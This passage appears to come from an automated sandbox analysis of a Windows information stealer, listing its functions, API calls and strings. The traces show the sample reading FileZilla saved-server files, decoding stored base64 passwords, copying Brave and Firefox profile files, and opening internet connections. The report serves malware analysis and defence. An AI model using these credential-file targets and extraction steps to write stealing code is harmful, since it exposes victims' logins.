                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 4c0abd68d796b557c9d337588bca0d553c92d7c3abc5c6f7875a8968e5345424
                        • Instruction ID: 9c416065710fb3943422406d841def72c50ae1a6b21e087ca0bff795968ad06a
                        • Opcode Fuzzy Hash: 4c0abd68d796b557c9d337588bca0d553c92d7c3abc5c6f7875a8968e5345424
                        • Instruction Fuzzy Hash: F9627031A1161AAFCB21AF68DD8DAEE77BDAF84300F148524F815A7290DF74DE45CB90
                        Function 00916960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009169C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00916A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00916A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00916AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00916B35
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916B9D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: 2cf0f9eeb19420b51a4959c78d41ba2a65d9934bf76de94224ae47b98e76780c
                        • Instruction ID: 37ca6146d8aece152871eec3ee3f46fcc738050251c9522c2ba7e0d7e6696c0c
                        • Opcode Fuzzy Hash: 2cf0f9eeb19420b51a4959c78d41ba2a65d9934bf76de94224ae47b98e76780c
                        • Instruction Fuzzy Hash: 72429071B0461AAFCB21ABB4DD8DBAEBBB9AF84700F144414F902E7291DF74D945CB60
                        Function 0090DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DBEF
                        • lstrlen.KERNEL32(00934CA8), ref: 0090DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC17
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 0090DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC4C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DC8F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0090DCD0
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0090DCF0
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0090DD0A
                        • lstrlen.KERNEL32(0092CFEC), ref: 0090DD1D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DD7B
                        • lstrlen.KERNEL32(00931794), ref: 0090DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDA3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DDAF
                        • lstrlen.KERNEL32(?), ref: 0090DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0090DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DE19
                        • lstrlen.KERNEL32(00931794), ref: 0090DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DE6F
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DE7B
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DEBB
                        • lstrlen.KERNEL32(00931794), ref: 0090DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DEE6
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DEF2
                        • lstrlen.KERNEL32(015E8A08), ref: 0090DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFA5
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DFB1
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DFF4
                        • lstrlen.KERNEL32(00931794), ref: 0090DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E022
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090E02E
                        • lstrlen.KERNEL32(015E8A08), ref: 0090E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0090E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0090E0E7
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E11F
                        • lstrlen.KERNEL32(015EE368), ref: 0090E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0090E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E19F
                        • lstrcat.KERNEL32(00000000), ref: 0090E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E1F9
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E22F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E261
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 0090E269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0090E988
                        • FindClose.KERNEL32(00000000), ref: 0090E997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: 69ea963d893e12511b6ceea807e58f3b5216136ca1bc4f9648888ed72cce6981
                        • Instruction ID: b422ad28a404577515f6b0b0fab0da4a235d36b3f165c244017edad0f230eabd
                        • Opcode Fuzzy Hash: 69ea963d893e12511b6ceea807e58f3b5216136ca1bc4f9648888ed72cce6981
                        • Instruction Fuzzy Hash: 7B527A71A116169FCB21EFB8DD89BAE7BB9AF84300F144428F856A72D1DF74DC058B90
                        Function 009060D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 009060FF
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906152
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906185
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009061B5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009061F0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00906233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: b01565c31f79055b195ca055354a92bfb806d61bf0235ab2be1a6fc492ed8c69
                        • Instruction ID: b3de5bc543753d3f791973ae1c6d219904ca6bdbc054558a3aecc628660c77a6
                        • Opcode Fuzzy Hash: b01565c31f79055b195ca055354a92bfb806d61bf0235ab2be1a6fc492ed8c69
                        • Instruction Fuzzy Hash: 91524D71A106169FDB21EFA8ED89BAE77B9AF84300F144424F815F7291DF74EC058B90
                        Function 00916B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916B9D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BCD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BFD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00916C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00916C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00916C5A
                        • lstrlen.KERNEL32(00000000), ref: 00916C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00916CE2
                        • lstrlen.KERNEL32(00000000), ref: 00916CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00916D6A
                        • lstrlen.KERNEL32(00000000), ref: 00916D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916DB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00916DF2
                        • lstrlen.KERNEL32(00000000), ref: 00916E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00916E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00916EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00916EC9
                        • LocalFree.KERNEL32(00000000), ref: 00916ED4
                        • lstrlen.KERNEL32(?), ref: 00916F6E
                        • lstrlen.KERNEL32(?), ref: 00916F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: fcee2d2f4a18650a0868209eeed56174e75f3f6566c609dae480e1f57017c2e4
                        • Instruction ID: 8e9530c2614adb4973693d59673fe732d0c266c960bf3d3f9abb5c9746b7382f
                        • Opcode Fuzzy Hash: fcee2d2f4a18650a0868209eeed56174e75f3f6566c609dae480e1f57017c2e4
                        • Instruction Fuzzy Hash: C2029170B1521AAFCB11ABB8DE4DBAE7BB9AF44700F244414F802E7291DF74DD418BA0
                        Function 00914B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914B7F
                        • lstrlen.KERNEL32(00934CA8), ref: 00914B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BA7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 00914BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00914BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 359e202e13c621a7ad2590565ed597d39f215c92c4b6df2b5fd25836416148ca
                        • Instruction ID: b61282f3f76abec3ab5ad51f5a34da981fe2e15bb5273254ae120230f6fa6e8c
                        • Opcode Fuzzy Hash: 359e202e13c621a7ad2590565ed597d39f215c92c4b6df2b5fd25836416148ca
                        • Instruction Fuzzy Hash: 90923170B01609DFDB25CF29D948B99B7E9AF84314F2A806DE4199B3A1DB71DC82CF40
                        Function 00911250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00911291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009112BF
                        • lstrlen.KERNEL32(00934CA8), ref: 009112CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112E7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 009112F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0091133A
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091135C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911376
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009113AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009113D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009113E2
                        • lstrlen.KERNEL32(00931794), ref: 009113ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091140A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911416
                        • lstrlen.KERNEL32(?), ref: 00911423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911443
                        • lstrcat.KERNEL32(00000000,?), ref: 00911451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091147A
                        • StrCmpCA.SHLWAPI(?,015EE1D0), ref: 009114A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009114E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911535
                        • StrCmpCA.SHLWAPI(?,015EF130), ref: 00911552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911593
                        • lstrcpy.KERNEL32(00000000,?), ref: 009115BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009115E4
                        • StrCmpCA.SHLWAPI(?,015EE3C8), ref: 00911602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911685
                        • StrCmpCA.SHLWAPI(?,015EE440), ref: 009116B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009116F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009117BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 009117F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091181C
                        • FindClose.KERNEL32(00000000), ref: 0091182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 3906c972e2ecf23050b31b6d952fbd3ea5cf6ee4d99a827bc61d3adcaf9e716c
